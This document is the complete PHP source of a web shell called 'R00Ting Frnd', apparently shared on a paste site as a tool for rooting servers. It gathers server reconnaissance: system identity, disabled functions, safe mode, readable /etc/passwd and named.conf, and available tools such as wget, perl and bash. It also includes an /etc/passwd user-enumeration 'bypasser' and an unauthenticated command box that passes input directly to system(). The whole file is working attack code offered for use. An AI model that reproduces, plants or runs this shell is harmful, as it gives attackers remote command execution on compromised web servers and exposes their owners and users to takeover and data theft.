R00Ting Frnd

1. <?php
2. #####################################
3. #R00Ting Frnd
4. #Helps You In Rooting Server
5. #Demo >> http://viper-7.com/ksKoIU/5.6.10?
6. #By H4T3D
7. #########################################
8. error_reporting(0);
9. function excute($cfe) {
10. $res = '';
11. if (!empty($cfe)) {
12. if(@function_exists('exec')) {
13. @exec($cfe,$res);
14. $res = join("\n",$res);
15. } elseif(@function_exists('shell_exec')) {
16. $res = @shell_exec($cfe);
17. } elseif(@function_exists('system')) {
18. @ob_start();
19. @system($cfe);
20. $res = @ob_get_contents();
21. @ob_end_clean();
22. } elseif(@function_exists('passthru')) {
23. @ob_start();
24. @passthru($cfe);
25. $res = @ob_get_contents();
26. @ob_end_clean();
27. } elseif(@is_resource($f = @popen($cfe,"r"))) {
28. $res = "";
29. while(!@feof($f)) { $res .= @fread($f,1024); }
30. @pclose($f);
31. } else { $res = "Ex() Disabled!"; }
32. }
33. return $res;
34. }
35.  
36. // Show Stat
37. function showstat($stat) {
38. if ($stat=="on") { return "<font color=green><b>ON</b></font>"; }
39. else { return "<font color=red><b>OFF</b></font>"; }
40. }
41. function named_conf(){
42. if(@is_readable('/etc/named.conf')){ return "<font color=green><b>Readable</b></font>";
43. }else { return "<font color=red><b>Not Readable</b></font>"; }
44. }
45. function passwd(){
46. if(@is_readable('/etc/passwd')){ return "<font color=green><b>Readable</b></font>";
47. }else { return "<font color=red><b>Not Readable</b></font>"; }
48. }
49. function testoracle() {
50. if (@function_exists('ocilogon')) { return showstat("on"); }
51. else { return showstat("off"); }
52. }
53. function testpostgresql() {
54. if (@function_exists('pg_connect')) { return showstat("on"); }
55. else { return showstat("off"); }
56. }
57. function testmssql() {
58. if (@function_exists('mssql_connect')) { return showstat("on"); }
59. else { return showstat("off"); }
60. }
61. function testmysql() {
62. if (@function_exists('mysql_connect')) { return showstat("on"); }
63. else { return showstat("off"); }
64. }
65.  
66. function showdisablefunctions() {
67. if ($disablefunc=@ini_get("disable_functions")){ return "<font color=red><b>".$disablefunc."</b></font>"; }
68. else { return "<font color=green><b>NONE</b></b></font>"; }
69. }
70. function openbase_dir() {
71. if ($openbase_dir=@ini_get('open_basedir')){ return "<font color=red><b>".$openbase_dir."</b></font>"; }
72. else { return "<font color=green><b>NONE</b></b></font>"; }
73. }
74. function testfetch() {
75. if(excute('fetch --help')) { return showstat("on"); }
76. else { return showstat("off"); }
77. }
78. function testwget() {
79. if (excute('wget --help')) { return showstat("on"); }
80. else { return showstat("off"); }
81. }
82. function testperl() {
83. if (excute('perl --help')) { return showstat("on"); }
84. else { return showstat("off"); }
85. }
86. function testpy() {
87. if (excute('python --help')) { return showstat("on"); }
88. else { return showstat("off"); }
89. }
90. function testsh() {
91. if (excute('bash --help')) { return showstat("on"); }
92. else { return showstat("off"); }
93. }
94. function testcurl() {
95. if (@function_exists('curl_version')) { return showstat("on"); }
96. else { return showstat("off"); }
97. }
98. if (@ini_get("safe_mode") or strtolower(@ini_get("safe_mode")) == "on") {
99. $safemode = TRUE;
100. $hsafemode = "<font color=red><b>ON (Secure)</b></font>";
101. }else{
102. $safemode = FALSE;
103. $hsafemode = "<font color=green><b>OFF (Not Secure)</b></font>";
104. }
105.  
106. $pwd=str_replace('\\', '/', dirname(__FILE__)).'/';
107.  
108. echo "
109. <html><head><title>Server Info ~ ".$_SERVER['HTTP_HOST']." ~</title>
110. <link href='https://fonts.googleapis.com/css?family=Orbitron' rel='stylesheet' type='text/css'>
111. <style>
112. html,body{
113. font-family: 'Orbitron', sans-serif;
114. background:#FFFFFF;
115. }
116. </style>
117. </head><body>
118. <center><h1>R00T Frnd -H4T3D</h1></center>
119. <center><h3>Your Rooting Frnd</h3></center>
120. <div class=info>
121. <table bgcolor=\"#ff0000\" width=\"100%px\" height=\"20px\"><tbody><tr>
122. </tr></tbody></table>
123. <font color=#000 size=2px>
124. <span><font color='#111'>
125. <br> UName -a: <font color=blue>".@php_uname()." </font>|</br>
126. <br> Hostname: <font color=blue>".$_SERVER['HTTP_HOST']."</font>|</br>
127. <br> Software : <font color=blue>".@getenv("SERVER_SOFTWARE")." </font>| </br>
128. <br> PHP Version: <font color=blue>".@phpversion()." </font>|</br>
129. <br> Current Dir: <font color=blue>{$pwd} |</font></br>
130. <br> ID:<font color=blue>" .@getmyuid()."(".@get_current_user().") </font>- UID:<font color=blue>".@getmyuid()."(".@get_current_user().") </font>- GID:<font color=blue>".@getmygid()."(".@get_current_user().") </font>|</br>
131. <br> Your IP:<font color=blue>".$_SERVER['HTTP_HOST']." </font>| The Server IP:<font color=blue>".@gethostbyname($_SERVER["HTTP_HOST"])." </font>|</br>
132. <br> Safe Mode: $hsafemode | Open_BaseDir: ".openbase_dir()."|</br>
133. <br> Disabled Functions: ".@showdisablefunctions()."|</br>
134. <br> named.conf File is: ".named_conf()." | passwd File is: ".passwd()."</br>
135. <br>
136. MySQL: ".@testmysql()."|
137. MSSQL: ".@testmssql()."|
138. Oracle: ".@testoracle()."|
139. PostgreSQL: ".@testpostgresql()."|
140. cURL: ".@testcurl()."|
141. Fetch: ".@testfetch()."|
142. WGet: ".@testwget()."|
143. Perl: ".@testperl()."|
144. Python: ".@testpy()."|
145. Bash: ".@testsh()."|
146. </center>
147. </font>
148. <br/>
149. </div>
150. <br/>
151. ";
152. ?>
153. <div id="r" align="center" style="border-bottom:10px solid #12549c;">
154. <a href="?sh3ll">&nbsp;[Sh3ll Execute]</a>
155. <a href="?bypass">&nbsp;[/etc/passwd Bypasser]</a>
156. </div>
157.  
158. <?php
159. if(isset($_GET['bypass'])){
160. ?>
161.  
162. <p align="center" dir="rtl"><font color="#008080">
163. <font color="red" face="Tahoma"><h1>/etc/passwd Bypasser </h1></font></a></font><font color="red">
164. <font color="red"><span lang="ar-sa">
165. <td width="50%"><font color=red>Server IP :<font color="black"><?php echo $_SERVER["SERVER_ADDR"].'</b>'?></font></font></td>
166. <td width="100%" colspan="2">
167. <p align="center">
168. <form action="" method="GET">
169. <input type="submit" value="Submit" name="r00t">
170. </td>
171. </form>
172. <?php
173. }
174. if(isset($_GET['r00t'])){
175. echo"<center><textarea rows=20 cols=100 wrap=off>";
176.  
177. for($uid=0;$uid<60000;$uid++){
178. $ara = posix_getpwuid($uid);
179. if (!empty($ara)) {
180.  
181. while (list ($key, $val) = each($ara)){
182. print "$val:";
183. }
184. print "\n";
185.  
186. }
187. }
188. echo "</textarea></center>";
189.  
190. }
191.  
192.  
193. elseif(isset($_GET['sh3ll'])){
194.  
195. echo'<form action="" method="POST">
196. <textarea name="comands" style="margin: 0px; width: 662px; height: 105px;">cat /etc/passwd</textarea>
197. </br>
198. <input type="submit"/>
199. </form>';
200. }
201.  
202.  
203. if(isset($_POST['comands'])){
204. echo "<h3>".$command."</h3></br>";
205.  
206. echo'<textarea style="margin: 0px; width: 916px; height: 288px;">';
207. $command=$_POST["comands"];
208. echo system($command)."\n";
209. echo'</textarea>';
210. }
211.  
212.  
213. ?>